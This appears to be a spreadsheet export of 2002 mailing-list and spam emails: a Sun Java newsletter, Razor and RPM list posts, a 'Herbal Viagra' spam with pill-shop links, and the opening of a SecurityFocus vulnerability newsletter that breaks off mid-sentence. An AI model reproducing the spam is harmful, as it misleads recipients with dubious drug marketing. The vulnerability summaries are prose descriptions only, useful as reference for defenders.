 Registered members of the Java Developer Connection&lt;sup&gt;SM&lt;/sup&gt; and Solaris Developer 
 Connection&lt;sup&gt;SM&lt;/sup&gt; programs will receive $300 off the registration price of $995.
  &lt;/p&gt;
 &lt;p&gt;
 SunNetwork 2002 Conference and Pavilion&lt;br&gt;
 Moscone Center&lt;br&gt;
 San Francisco, California&lt;br&gt;
 Sept. 18-20, 2002&lt;br&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://www.sun.com/sunnetwork13?s=04&amp;w=37"&gt;Register for the SunNetwork 2002 Conference&lt;/a&gt;, 
 use the code JDC334.
 &lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;h3&gt;Product and Technology Releases&lt;/h3&gt;
 &lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr valign="top"&gt;
 &lt;td&gt;
 The following J2SE products and technologies were recently released.&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;a href="http://java.sun.com/products/javawebstart/?s=04&amp;w=37"&gt;Java Web Start v1.2 RC&lt;/a&gt;&lt;br&gt;
 Launch applications simply by clicking on a Web page. Now available for download as part of J2SE 
 v1.4.1. (Aug 20, 2002)
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/j2se/1.4.1/?s=04&amp;w=37"&gt;Java 2 SDK, Standard Edition Release Candidate 
 (RC) v1.4.1&lt;/a&gt;&lt;br&gt;
 Builds upon Java technology's cross-platform support and robust security model with new features and 
 functionality, enhanced performance and scalability. (Aug 20, 2002)
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://jcp.org/aboutJava/communityprocess/first/jsr152/index.html?s=04&amp;w=37"&gt;JSR-000152 
 JavaServer Pages Specification v2.0,&lt;/a&gt;&lt;br&gt;
 Proposed Final Draft. This is next revision of the JavaServer Pages specification. (Aug 16, 2002)
 &lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;table border="0" cellpadding="1" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;h3&gt;Early Access Releases&lt;/h3&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;p&gt;
 The following J2SE products and technologies were recently made available through the Early Access 
 Release Program.
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://developer.java.sun.com/developer/releases/javawebstart/?s=04&amp;w=37"&gt;Java Web Start 
 v1.2 RC Sample Applications&lt;/a&gt; Contains descriptions and downloads of sample applications, ranging 
 from CORBA to a WebPad application, for the Java Web Start product. (Aug 20, 2002)
 &lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;table width="100%" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr valign="top"&gt;
 &lt;td&gt;
 &lt;h3&gt;Hot Downloads&lt;/h3&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/products/javawebstart/download-solaris.html?s=04&amp;w=37"&gt;Java Web 
 Start&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/products/jdk/1.1/jre/?s=04&amp;w=37"&gt;Java Runtime Environment&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/products/java-media/zzzf/2.1.1/download.html?s=04&amp;w=37"&gt;Java Media 
 Framework Software v2.1.1&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/xml/download.html?s=04&amp;w=37"&gt;Java Technology XML and Web Services 
 Products&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/j2se/1.4/download.html?s=04&amp;w=37"&gt;Java Development Kit&lt;/a&gt;
 &lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://developer.java.sun.com/images/pixel.gif" width="175" height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;!-- END LEFT COLUMN --&gt;
 &lt;td bgcolor="#ffffff" width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" 
 width="10" height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;td bgcolor="#666699" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" 
 height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffffff" width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" 
 width="10" height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;!-- BEGIN RIGHT CONTENT --&gt;
 &lt;!-- BEGIN SEARCH BOX --&gt;
 &lt;td valign="top" bgcolor="#ffffff" width="395"&gt;
 &lt;div align="right"&gt;&lt;b&gt;September 12, 2002&lt;/b&gt;&lt;/div&gt;
 &lt;FORM METHOD="GET" ACTION="http://search.java.sun.com/search/java/"&gt;
 &lt;table border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td width="50%"&gt;&lt;h3&gt;Resources&lt;/h3&gt;
 &lt;/td&gt;
 &lt;td valign="middle" align="right"&gt;
 &lt;font size="2"&gt;
 &lt;INPUT TYPE="text" SIZE="15" MAXLENGTH="128" NAME=qt&gt;&lt;/FONT&gt;&lt;/td&gt;
 &lt;td VALIGN="middle" WIDTH="55"&gt;
 &lt;INPUT TYPE="image" SRC="http://developer.java.sun.com/images/v4a_search.gif" ALT="Search" 
 value="search" BORDER="0" WIDTH="55"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/FORM&gt;
 &lt;!-- END SEARCH BOX --&gt;
 &lt;p&gt;
 Learn more about, and get &amp;quot;hands-on&amp;quot; training for J2SE&lt;sup&gt;TM&lt;/sup&gt; technologies through 
 the following resources.
 &lt;/p&gt;
 &lt;h3&gt;Technical Articles&lt;/h3&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://java.sun.com/features/2002/08/j2se-network.html?s=04&amp;w=37"&gt;Network Programming 
 with J2SE v1.4&lt;/a&gt;&lt;br&gt;
 Take advantage of the new features and enhancements of J2SE v1.4, such as new protocols, and 
 improved performance of existing features. (September 3, 2002)
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="http://java.sun.com/features/2002/09/pword_mask.html?s=04&amp;w=37"&gt;Password Masking in the 
 Java Programming Language&lt;/a&gt;&lt;br&gt;
 Read how to easily mask passwords with AWT/Swing methods. (September 5, 2002)
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="http://forte.sun.com/ffj/articles/macOSX.html?s=04&amp;w=37"&gt;Installing Sun ONE Studio 
 Software on Macintosh OS X&lt;/a&gt;&lt;br&gt;
 Read about installation of Sun ONE Studio release 3.0 and 4, and NetBeans 3.3.1 on Apple Macintosh 
 OS X, and configuration of the IDE to use an external browser. (August 15, 2002)
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;h3&gt;Tech Tips&lt;/h3&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;a href="http://java.sun.com/jdc/JDCTechTips/2002/tt0910.html?s=04&amp;w=37"&gt;Get insights into 
 ArrayList and LinkedList,&lt;/a&gt; and where each is the better programming choice. Also learn how to 
 effectively use zero-length arrays. (September 10, 2002)&lt;br&gt;&lt;br&gt;&lt;/li&gt;
   &lt;li&gt;&lt;a href="http://java.sun.com/jdc/JDCTechTips/2002/tt0821.html?s=04&amp;w=37"&gt;Maintaining a 
 Priority Queue, and Displaying Text in Multiple Styles.&lt;/a&gt;  Learn to build prioritization into a 
 collection of items and to display text in multiple colors with JTextPane. (August 21, 
 2002)&lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;h3&gt;Chat&lt;/h3&gt;
 &lt;p&gt;
 &lt;a href="http://developer.java.sun.com/developer/community/chat/index.html"&gt;New I/O (NIO) APIs&lt;/a&gt;:
     The NIO APIs added to J2SE v1.4 provide new features and improved performance in the areas of 
 buffer management, character-set support, regular-expression matching,
     file I/O, and scalable network I/O. Don't miss the opportunity to
     learn more about the NIO APIs, and get questions answered in this chat with two key
     members of the NIO engineering team: Mark Reinhold and Michael
     McCloskey.&lt;br&gt;(Sept. 19, 11:00 A.M. PDT/6:00 P.M. GMT)
 &lt;/p&gt;
 &lt;h3&gt;Tutorials &amp;amp; Code Samples&lt;/h3&gt;
 &lt;ul&gt;
   &lt;li&gt;Error Handling: &lt;code&gt;ListOfNumbers.java&lt;/code&gt; code sample shows how to use a try and catch 
 block to catch exceptions. For supporting information see &amp;quot;The Java Tutorial: Handling Errors 
 Using Exceptions.&amp;quot; (September 3, 2002)&lt;br&gt;&lt;br&gt;
 &lt;a 
 href="http://java.sun.com/docs/books/tutorial/essential/exceptions/example-1dot1/ListOfNumbers.java?
 s=04&amp;w=37"&gt;&lt;b&gt;Code Sample&lt;/b&gt;&lt;/a&gt; | &lt;a 
 href="http://java.sun.com/docs/books/tutorial/essential/exceptions/index.html?s=04&amp;w=37"&gt;&lt;b&gt;Tutorial
 &lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="http://developer.java.sun.com/developer/Quizzes/aboutjava/?s=04&amp;w=37"&gt;Tutorial 
 Quiz:&lt;/a&gt; The first page of the lesson, &amp;quot;The Java Technology Phenomenon,&amp;quot; by Mary Campione 
 and Kathy Walrath establishes some basic facts about the Java platform. Take this quiz to test your 
 basic knowledge. (September 3, 2002)
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;h3&gt;Sun Technology Audiocast&lt;/h3&gt;
 &lt;p&gt;
 &lt;a href="http://java.sun.com/jdc/onlineTraining/webcasts/20plus/cchan2.html?s=04&amp;w=37"&gt;Java Web 
 Start:&lt;/a&gt; This beginner-level code camp covers how Java Web Start works, how to package an 
 application for deployment, and using the JNLP (Java Network Launch Protocol) API. (July 31, 2002)
 &lt;/p&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;h3&gt;In The Spotlight&lt;/h3&gt;
 &lt;p&gt;
 The latest version of the &lt;a href="http://java.sun.com/j2se/javadoc/mifdoclet/?s=04&amp;w=37"&gt;MIF 
 Doclet&lt;/a&gt; is now available. It works with Java 2 SDK v1.4, and includes 10 new features and 48 bug 
 fixes.
 &lt;/p&gt;
 &lt;h3&gt;Events&lt;/h3&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;a href="http://www.sun.com/sunnetwork13?s=04&amp;w=37"&gt;SunNetwork 2002 Conference and 
 Pavilion&lt;/a&gt;&lt;br&gt;
 Moscone Center&lt;br&gt;
 San Francisco, California&lt;br&gt;
 September 18-20, 2002
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
   &lt;li&gt;&lt;a href="http://java.sun.com/javaone?s=04&amp;w=37"&gt;2002 JavaOne Conference in Japan&lt;/a&gt;&lt;br&gt;
 Yokohama, Japan,&lt;br&gt;
 September 25-27, 2002&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
   &lt;li&gt;&lt;a href="http://www.sys-con.com/webservicesEdge2002West/"&gt;JDJEdge 2002 West Conference&lt;/a&gt;&lt;br&gt;
 San Jose, CA&lt;br&gt;
 October 1-3, 2002&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;!-- DO NOT REMOVE IMAGE BELOW --&gt;
 &lt;img src="http://developer.java.sun.com/images/pixel.gif" width="395" height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;!-- END RIGHT CONTENT --&gt;
 &lt;td bgcolor="#ffffff" width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" 
 width="10" height="1" alt="pixel"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- BEGIN FOOTER --&gt;
 &lt;table bgcolor="#ffffff" width="611" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="10" height="1" 
 alt="pixel"&gt;&lt;/td&gt;
 &lt;td width="591"&gt;
 &lt;hr noshade color="#666699"&gt;
 &lt;span class="small"&gt;IMPORTANT: Please read our Terms of Use, Privacy, and Licensing policies:&lt;br&gt;
 &lt;a href="http://www.sun.com/share/text/termsofuse.html?s=04&amp;w=37"&gt;&lt;span 
 class="link"&gt;http://www.sun.com/share/text/termsofuse.html&lt;/span&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.sun.com/privacy/?s=04&amp;w=37"&gt;&lt;span 
 class="link"&gt;http://www.sun.com/privacy/&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
 Comments? Send your feedback on the Core Java Technologies Newsletter to: &lt;a 
 href="mailto:jdc-webmaster@java.sun.com"&gt;&lt;span class="link"&gt;jdc-webmaster@java.sun.com&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
 Subscribe to other Java technology newsletters:
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
   - Java Technology Fundamentals Newsletter. Learn the basics of
     the Java programming language and keep up-to-date on
     additions to the New-to-Java Programming Center.&lt;br&gt;
   - Enterprise Java Technologies Newsletter. Learn about new
     products, tools, resources, and events of interest to
     developers working with enterprise Java technologies.&lt;br&gt;
   - Wireless Developer Newsletter. Learn about the latest
     releases, tools, and resources for developers working on
     wireless and Java Card technologies and applications.&lt;br&gt;&lt;br&gt;
 &lt;/span&gt;
 &lt;span class="small"&gt;
   - To subscribe, visit the &lt;a href="http://developer.java.sun.com/subscription/?s=04&amp;w=37"&gt;&lt;span 
 class="link"&gt;JDC Newsletters and Publications page,&lt;/span&gt;&lt;/a&gt;
     select the newsletters you want to subscribe to and click &amp;quot;Update&amp;quot;.&lt;br&gt;
   - To unsubscribe, go to the &lt;a href="http://developer.java.sun.com/subscription/?s=04&amp;w=37"&gt;&lt;span 
 class="link"&gt;subscriptions page&lt;/span&gt;&lt;/a&gt;, uncheck the appropriate checkbox, and click 
 &amp;quot;Update&amp;quot;.
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;ARCHIVES: You'll find the Core Java Newsletter archives at:&lt;br&gt;
 &lt;a href="http://java.sun.com/jdc/techDocs/Newsletters/jdc_newsletters.html?s=04&amp;w=37"&gt;&lt;span 
 class="link"&gt;http://java.sun.com/jdc/techDocs/Newsletters/jdc_newsletters.html&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;&lt;a href="http://java.sun.com/jdc/copyright.html"&gt;&lt;span class="link"&gt; Copyright 
 &lt;/span&gt;&lt;/a&gt; 2002 &lt;a href="http://www.sun.com"&gt;&lt;span class="link"&gt;Sun Microsystems, Inc.&lt;/span&gt;&lt;/a&gt; 
 All rights reserved. 4150 Network Circle, Santa Clara, CA 95054 USA
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;Sun, Sun Microsystems, SunNetwork, Java, Java Developer Connection, Solaris 
 Developer Connection, NetBeans, JavaServer Pages, and J2SE are trademarks or registered trademarks 
 of Sun Microsystems, Inc. in the United States and other countries.
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;a href="http://www.sun.com?s=04&amp;w=37"&gt;&lt;img src="http://developer.java.sun.com/images/lgsun.gif" 
 border="0"
 alt="Sun Microsystems, Inc."&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="10" height="1"
 alt="pixel"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- END FOOTER --&gt;
 &lt;/td&gt;
 &lt;!-- END WRAPPER --&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table bgcolor = "#efefef"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://bulkmail.sun.com/servlet/PreferenceServlet?action=change&amp;pref_name=content-type&amp;pref_value=text&amp;id=21986283-1597827694"&gt;Please send me newsletters in text.&lt;/a&gt;&lt;br&gt;&lt;a href="http://bulkmail.sun.com/unsubscribe?21986283-1597827694"&gt;Please unsubscribe me from this newsletter.&lt;/a&gt;&lt;img src="http://bulkmail2.sun.com/OTServlet?id=21986283-1597827694" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; it's engineering that uses the general mechanism of genetics (inheritance of 
 &gt; traits) without understanding the specific mechanisms (genes, DNA, etc.).
 Ah, like the way we used to make babies.  And wine.  And war.
 Cheers,
 Wayne
 And anagrams.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Collision of hashes?
</t>
  </si>
  <si>
    <t xml:space="preserve">To continue the subject on an otherwise unrelated note, the following
 personal correspondence was just flagged as spam:
 The following is a slightly modified e-mail message trapped in a server-wide
 spam box.
 ------
 NEWSPAPER?????
 any time estimate when we can expect you home?
 dad
                     &lt;********@**********       To:
 &lt;*************@***************&gt;
                     *********&gt;                 cc:
                                                Subject:     Oh, yeah
                     09/12/2002 12:43 PM
 I have to stay after school today so I can work on the school newspaper
 (layout) -- Nords will bring me home later than usual.
 ------
 I don't know how to explain this one.
 --Will
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial...              ONCXBV
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;ViaPro&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#FFFFFF"&gt;
 &lt;CENTER&gt;&lt;TABLE BORDER=3D"0" CELLPADDING=3D"0"
 CELLSPACING=3D"0" WIDTH=3D"502"&gt;
 &lt;TR&gt;
 &lt;TD VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.thepill4u.com/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.thepill4u.com/mail/1_1.jpg"
 WIDTH=3D"226" HEIGHT=3D"183" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;TD VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.thepill4u.com/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.thepill4u.com/mail/2_1.gif"
 WIDTH=3D"276" HEIGHT=3D"183" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD COLSPAN=3D"2" VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.thepill4u.com/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.thepill4u.com/mail/1_1-2.gif"
 WIDTH=3D"502" HEIGHT=3D"126" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;
 &lt;a href=3D"http://www.herbs4you.net/service.html"&gt;exit
 list instructions&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 pmoney
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Python 2.2 site libs?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=-ITC4wxYrfSWQCmQFalKh
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 On Thu, 2002-10-03 at 08:16, Mark Derricutt wrote:
 &gt; Anyone know where one could get rpms for alot of the python libraries for=
 =20
 &gt; 2.2?
 &gt;=20
 &gt; Its darn annoying the way RH ship python 1.5.2 and python 2.2 (as python2=
 )=20
 &gt; and libs that only work with one or the other :(
 &gt;=20
 &gt; esp. the pgdb and xml modules.
 &gt;=20
 &gt; Anyone know why Red Hat insist on sticking with python 1.5.2?
 &gt;
 they are on python 2.2 for 8.0 - but they don't like to break
 compatibility during major releases.
 therefore: 6.X was 1.5.2 b/c that was current
 7.x was 1.5.2 b/c that was current when 7.0 was released.
 -sv
 --=-ITC4wxYrfSWQCmQFalKh
 Content-Type: application/pgp-signature; name=signature.asc
 Content-Description: This is a digitally signed message part
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQA9nEQh1Aj3x2mIbMcRAg/FAJ9MNwAv4hzpR4gjkMGGtGUjFKidQQCgk0ZE
 DlQVAibjHkM4H9ZBYzs0xb4=
 =8gIA
 -----END PGP SIGNATURE-----
 --=-ITC4wxYrfSWQCmQFalKh--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is rap music art? Rap song about farting answers that question
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423196,1717/
 Date: 2002-10-01T08:34:09+01:00
 [IMG: http://www.newsisfree.com/Images/fark/ncbuy.gif ([NCBuy])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] spamassassin+razor2
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --4Ycl1UgPPPgGZoSL
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote:
 &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open whi=
 le runn
 &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.p=
 m line
 &gt; 410, &lt;GEN23&gt; line 1.
 &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002
 &gt;  Subject: *****SPAM***** Computer Maintenance
 &gt;   Folder: /home/eugene/caughtspam                                        =
   8343
 It looks like you're running via procmail -- what are the permissions
 on procmail?  "Insecure dependency" screams "I'm in taint mode!", which
 is a typical problem when procmail is setuid/setgid (the permissions
 should be 755).
 If this is in fact the problem, an easy solution is to put "DROPPRIVS=3Dyes"
 in the procmailrc. :)
 --=20
 Randomly Generated Tagline:
 "The bus had no heat, blew over in the wind and used the driver's legs
  as its first line of defense in an accident." - Unknown about the VW Bus
 --4Ycl1UgPPPgGZoSL
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9d8C5AuOQUeWAs2MRAhaSAJ9AxnypfiK/+5I6gxO8sTauLOJ3wgCg0N5b
 HPwI8USX9YeAQF6GE4bzmgc=
 =6aCu
 -----END PGP SIGNATURE-----
 --4Ycl1UgPPPgGZoSL--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</si>
  <si>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&gt;  &gt;Tom R:
 &gt;&gt;&gt;  
 &gt;&gt;&gt;&lt;http://www.cliktrik.com/people/family/me/0419.jpg&gt;http://www.cliktrik.com/people/family/me/0419.jpg
 &gt;&gt;&gt;
 &gt;&gt;Which one's you?
 &gt;
 &gt;I'm actually taking the photo -- both figures are in fact waxworks.
 &gt;
 &gt;This was in Mme Tussaud's in, of all places, Sydney Australia.
 &gt;
 &gt;       /t
 &gt;--
 damn it Tom!! I had my kids believing you knew Albert Einstein!!
 Well, until the smart one asked just how old you were now.
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SecurityFocus Linux Newsletter #92
</t>
  </si>
  <si>
    <t xml:space="preserve">
 SecurityFocus Linux Newsletter #92
 ----------------------------------
 This newsletter is sponsored by: SecurityFocus DeepSight Threat Management
 System
 &gt;&gt;From June 24th - August 31st, 2002, SecurityFocus announces a FREE
 two-week trial of the DeepSight Threat Management System: the only early
 warning system providing customizable and comprehensive early warning of
 cyber attacks and bulletproof countermeasures to prevent attacks before
 they hit your network.
 With the DeepSight Threat Management System, you can focus on proactively
 deploying prioritized and specific patches to protect your systems from
 attacks, rather than reactively searching dozens of Web sites or hundreds
 of emails frantically trying to gather information on the attack and how
 to recover from it.
 Sign up today!
 http://www.securityfocus.com/corporate/products/promo/tmstrial-lx.shtml
 -------------------------------------------------------------------------------
 I. FRONT AND CENTER
      1. Advanced Log Processing
      2. Assessing Internet Security Risk, Part Three: an Internet...
      3. Copyright, Security, and the Hollywood Hacking Bill
      4. SecurityFocus DPP Program
 II. LINUX VULNERABILITY SUMMARY
      1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow...
      2. Abyss Web Server HTTP GET Request Directory Contents Disclosure...
      3. DotProject User Cookie Authentication Bypass Vulnerability
      4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
      5. phpBB2 Gender Mod Remote SQL Injection Vulnerability
      6. ShoutBox Form Field HTML Injection Vulnerability
      7. Sympoll File Disclosure Vulnerability
      8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
      9. William Deich Super SysLog Format String Vulnerability
      10. Frederic Tyndiuk Eupload Plain Text Password Storage...
      11. Util-linux File Locking Race Condition Vulnerability
      12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer...
      13. OpenSSL ASCII Representation Of Integers Buffer Overflow...
      14. ParaChat Phantom User Denial Of Service Vulnerability
      15. OpenSSH Trojan Horse Vulnerability
      16. Bharat Mediratta Gallery Remote File Include Vulnerability
      17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer...
      18. Dispair Remote Command Execution Vulnerability
      19. Mailreader Session Hijacking Vulnerability
      20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability
      21. Fake Identd Client Query Remote Buffer Overflow Vulnerability
 III. LINUX FOCUS LIST SUMMARY
      1. LDAP Auth? (Thread)
      2. LDAP auth (Thread)
      3. Administrivia: Gone Fishin' (Thread)
 IV. NEW PRODUCTS FOR LINUX PLATFORMS
      1. Gateway Guardian
      2. PakSecured Linux
      3. Progressive Systems VPN
 V. NEW TOOLS FOR LINUX PLATFORMS
      1. Astaro Security Linux (Stable 3.x) v3.202
      2. FCheck 2.07.59
      3. The @stake Sleuth Kit (TASK) v1.50
 VI. SPONSORSHIP INFORMATION
 I. FRONT AND CENTER
 -------------------
 1. Advanced Log Processing
 By Anton Chuvakin
 Reading logs is a crucial part of incident detection and response.
 However, it is easy for security personnel to be overwhelmed by the sheer
 volume of logs. This article will offer a brief overview of log analysis,
 particularly: log transmission, log collection and log analysis. It will
 also briefly touch upon log storing and archival.
 http://online.securityfocus.com/infocus/1613
 2.  Assessing Internet Security Risk, Part Three: an Internet Assessment
 Methodology Continued
 by Charl van der Walt
 This article is the third in a series that is designed to help readers to
 assess the risk that their Internet-connected systems are exposed to. In
 the first installment, we established the reasons for doing a technical
 risk assessment. In the second part, we started to discuss the methodology
 that we follow in performing this kind of assessment. In this installment,
 we will continue to discuss methodology, particularly visibility and
 vulnerability scanning.
 http://online.securityfocus.com/infocus/1612
 3. Copyright, Security, and the Hollywood Hacking Bill
 By Richard Forno
 Proposed copyright enforcement legislation may allow the powerful
 entertainment lobby to circumvent fundamental constitutional protections,
 and may create chaos on the Internet.
 http://online.securityfocus.com/columnists/99
 4. SecurityFocus DPP Program
 Attention Non-profit Organizations and Universities!!
 Sign-up now for preferred pricing on the only global early-warning system
 for cyber attacks - SecurityFocus DeepSight Threat Management System.
 Click here for more information:
 http://www.securityfocus.com/corporate/products/dpsection.shtml
 II. BUGTRAQ SUMMARY
 -------------------
 1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
 BugTraq ID: 5363
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5363
 Summary:
 OpenSSL is an open source implementation of the SSL protocol. It is used
 by a number of other projects, including but not restricted to Apache,
 Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
 systems.
 A buffer overflow vulnerability has been reported in some versions of
 OpenSSL.
 When initiating an OpenSSL session, some information is shared between the
 client and the server, including key data. The reported vulnerability lies
 in the handling of the client key value during the negotiation of the
 SSLv2 protocol.
 A malicious client may exploit this vulnerability by transmitting a
 malformed key to the vulnerable server. Careful exploitation may result in
 execution of arbitrary code as the server process, and the attacker
